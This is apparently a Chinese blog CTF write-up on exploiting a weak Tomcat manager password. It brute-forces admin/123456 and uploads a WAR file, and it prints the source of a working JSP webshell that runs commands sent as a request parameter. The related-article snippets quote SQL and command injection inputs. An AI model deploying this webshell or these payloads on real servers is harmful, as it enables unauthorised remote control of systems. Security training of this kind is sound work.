CTF-Tomcat后台弱口令漏洞利用

最新推荐文章于 2025-03-31 10:36:56 发布
最新推荐文章于 2025-03-31 10:36:56 发布
阅读量2.4k 收藏 4
点赞数
分类专栏: 墨者学院
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/asd158923328/article/details/100050134
版权
本文介绍了如何利用CTF比赛中遇到的Tomcat后台弱口令问题,通过Burp Suite进行账号密码爆破,成功登陆后发现可上传文件的界面。接着详细阐述了制作和利用War木马的过程,包括jsp木马源码的展示,以实现远程命令执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

根据题意
在这里插入图片描述
进入环境,随便点击靶机链接,跳出一个登录界面,因为题目提示网站后台账号密码存在弱口令,用burpsuite爆破得到账号密码为:admin/123456
在这里插入图片描述
登录进去过后,发现有一个上传界面,根据解题方向上传一个war木马即可:
在这里插入图片描述
war木马的制作过程:
jsp木马源码
<%
if(“023”.equals(request.getParameter(“pwd”))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(“i”)).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("

");

while((a=in.read(b))!=-1){
 

out.println(new String(b));

}

out.print("
");
}
%>
将jsp木马放入
最低0.47元/天 解锁文章
CTF-BeesCMS系统漏洞分析溯源
asd158923328的博客
08-21 4824
根据题意 漏洞原因:因为BeesCMS后台登陆页面存在sql注入,可以被用来写入一句话木马或者查看管理员密码 进入环境,通过御剑工具扫描网站目录,发现/admin/login.php 首先在用户名 中 输入 ‘ 出现了报错, 确认后台登陆页面的user 有存在sql注入。 然后输入 ‘ or 1=1 # 就返回了正常的登陆失败的页面。 sql 回显可以看出有五个字段 所以尝试 ‘ unio...
Tomcat漏洞——弱口令爆破
weixin_57379923的博客
08-07 667
靶机:CentOS7 IP:192.168.100.40。攻击机:kali IP:192.168.100.60。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!作 者:PeiyuJue。
CTF writeup:tomcat上传webshell后门
samohyes的博客
07-01 5127
做了ZJU school-bus的一个题目,给了链接,***:**,在IP加端口后面写入manager/html跳出让你输密码,网上找个弱口令尝试的py文件很快就可以解出来。 tomcat:tomcat。 后面进去了网站要往上传个后门,找了好多地方没找到后门,自己写暂时水平不够,后来终于找到了一个。 https://scoperchiatore.wordpress.com/my-webshe
[Vulfocus解题系列]Tomcat-pass-getshell 弱口令,从零基础到精通,收藏这篇就够了!
最新发布
喜欢Python编程的程序员柚柚呀
03-31 815
名称:Tomcat-pass-getshell 弱口令描述: Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。通过弱口令登录后台,部署war包geshell。
ctf入门漏洞挖掘
Tesi1a的充电桩
04-16 5116
基本功是计算机基础三大金刚的学习:体系结构–cpu的设计与实现 机器指令与汇编语言 指令的解码,执行 内存管理 CMU 18-477 introduction to Computer Architecture https://www.ece.cmu.edu/~ece447/s15/doku.php https://www.ece.cmu.edu/~ece447/s13/doku.php?
(墨者学院)Tomcat后台弱口令漏洞利用
qq_41453632的博客
01-08 2857
第一部:随便点击靶机链接,跳出一个登录界面,因为题目提示网站后台账号密码存在弱口令,用burpsuite爆破得到账号密码为:admin/123456 第二步:登录进去过后,发现有一个上传界面,所以直接上传一个war木马即可: 这里先普及下war木马的制作过程: 1.找到一个jsp的小马(我这里先用我使用的jsp木马做例子) &lt;% if("023".equals(requ...
墨者学院tomcat后台弱口令漏洞利用
wrypot的博客
03-16 440
点击之后要我们登录,这里abc123:999user是base64解码之后的结果,可见要爆破base64编码,这里不写爆破过程了,下一期出一下爆破过程,这里直接给结果,用户名密码分别是admin/123456。这里有个上传点,要我们上传war包,我们需要知道,tomcat是php代码的,所以不能用一句话木马,我们可以用冰蝎自带的jsp木马,jsp是java代码块,可以被tomcat解析。shell.war包上传成功,我们打开这里的shell。我们在url栏输入war包里面的shell.jsp木马。
weblogic漏洞系列- 弱口令
god_Zeo的安全博客
09-05 2584
【研究】weblogic漏洞系列- 弱口令和解密1.环境2.原理3.影响版本4.利用过程任意文件读取漏洞利用webshell 1.环境 Weblogic版本:10.3.6(11g) Java版本:1.6 本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对weblogic场景的渗透。 环境启动后,weblogic后台访问htt...
tomcat常见漏洞
qq_46416934的博客
06-18 3552
目录前言一、任意文件上传1.1 影响版本1.2 初始配置1.3 漏洞详情二、CVE-2020-1938?文件包含漏洞2.1 影响版本2.2 漏洞详情三、未授权弱口令+war后门上传总结tomcat和apache一样是一个免费的服务器,主要用于jsp框架的网站,可以看作是apache的一个扩展,但是运行的时候和apache属于不同的进程。本文主要介绍tomcat的未授权访问、任意文件上传、文件包含漏洞tomcat 7.0.x --------------cve-2017-12615需要在windows下将配
一次贴近实战的CTF比赛(cookie欺骗、php函数、Tomcat漏洞、注入、逆向等)
渗透、攻防、CTF、编程
06-29 8897
19题170分 一、web安全-29 1.cookie欺骗(web登录)9 http://***.***.***.50:8040/admin/login.asp 解题思路: http://***.***.***.50:8151/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,passw...
记录遇到的有趣的CTF---simple_api(xxe漏洞)
tothemoon的博客
11-05 2338
这是我参加的一场校内的CTF比赛。大佬们的write up还在整理当中,我就先用我之前做题时的截图做一个简单的复现。write up出来后再查漏补缺。 1.打开网站后除了这个啥也没有,查看源代码也没有提示。 学过python的同学应该会发现这一段字典,但在这里的意思应该是响应错误,但仔细看了源码后也没与发现注入点,这时想到题目名为simple_api。 抓包添加xxe代码后就能跑出flag了。 x...
漏洞挖掘】攻击对外开放的Docker API接口
weixin_30359021的博客
01-22 372
https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124 1)场景 攻击开放在互联网的Docker API 2)问题难点 Docker API外放有什么危害? 3)解决问题的方法 理解客户API公开互联网的原理 信息收集和枚举 利用Docker CLI测试暴露的API 批量挖掘 ...
漏洞发现-API 接口服务之漏洞探针类型利用修复
硫酸超的博客
09-21 1423
漏洞发现-API 接口服务之漏洞探针类型利用修复接口服务类安全测试演示案例端口服务类-Tomcat弱口令安全问题端口服务类-Glassfish任意文件读取其他补充类基于端口WEB站点又测试其他补充类-基于城名WEB站点又测试其他补充类基于IP配合端口信息再收集口令安全脚本工具简要使用-SnetcrackerAPI接口类-网络服务类探针利用测试-AWVS 接口服务类安全测试 根据前期信息收集针对目标端口服务类探针后进行的安全测试,主要涉及攻击方法:口令安全,WEB类漏洞,版本漏洞等,其中产生的危害可大可小
漏洞发现-API接口服务之漏洞探针类型利用修复
Rnan_prince的博客
08-01 1270
端口服务类安全测试 根据前期信息收集针对目标端口的服务类探针后,进行安全测试,主要的攻击方法有: 口令安全 WEB漏洞 版本漏洞等 其中产生的危害可大可小,属于端口服务/第三方服务类安全测试面。一般在已知应用无思路的情况下选用的安全测试方案。 工具 SNET工具 acunetix API接口 - Web Service RESTFul API 根据应用自身的功能方向决定,安全测试目标需要有API接口调用才能进行此类测试,主要涉及的安全问题:自身安全,WEB类漏洞,版本漏洞等。其中产生的危..
CTF【每日一题20160618】挖掘规则里面的漏洞
hhhparty的博客
06-18 2322
继续黑客游戏第四关,逆向解密下载后打开看到一个“空白”的pdf文档。由于对pdf加解密相当无知,所以百度一下,有人这样回答: “有几种可能性: 一、文档本来就是空白。 很多垃圾网站或软件,通过给文档取一些具有欺骗性的名称,诱骗人们去安装什么软件、注册什么网站,甚至骗取个人信息、IM账号、邮箱等等,有的还利用这些方式获取个人银行账号等等。到受害者意识到骗局时,已经为时已晚。 二、暴力破解的后果。
墨者学院-Tomcat后台弱口令漏洞利用
qq_37850901的博客
09-26 300
墨者学院-Tomcat后台弱口令漏洞利用 首先在网上搜索默认tomcat账号密码 进行尝试,登陆成功 中找到上传点,需要上传war包 于是制作一个war包木马 上传并部署访问这个目录,的木马 最终找到key ...
CTF-web(命令执行漏洞)
分享与记录
04-09 2436
部分web应用程序提供了一些命令执行的操作,如果没有过滤好用户输入的数据,就很有可能形成系统命令执行漏洞。 先上题,这是一个实现ping功能的web界面 ping一下127.0.0.1看看 在window下,&&可以将两条命令连接起来执行,linux下同样适用 127.0.0.1 && ls 感觉这跟SQL注入有点像,所以说有输入的地方就可能存在漏洞,执行上面...
中间件安全—Tomcat常见漏洞
剁椒鱼头没剁椒的博客
02-22 7093
链接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值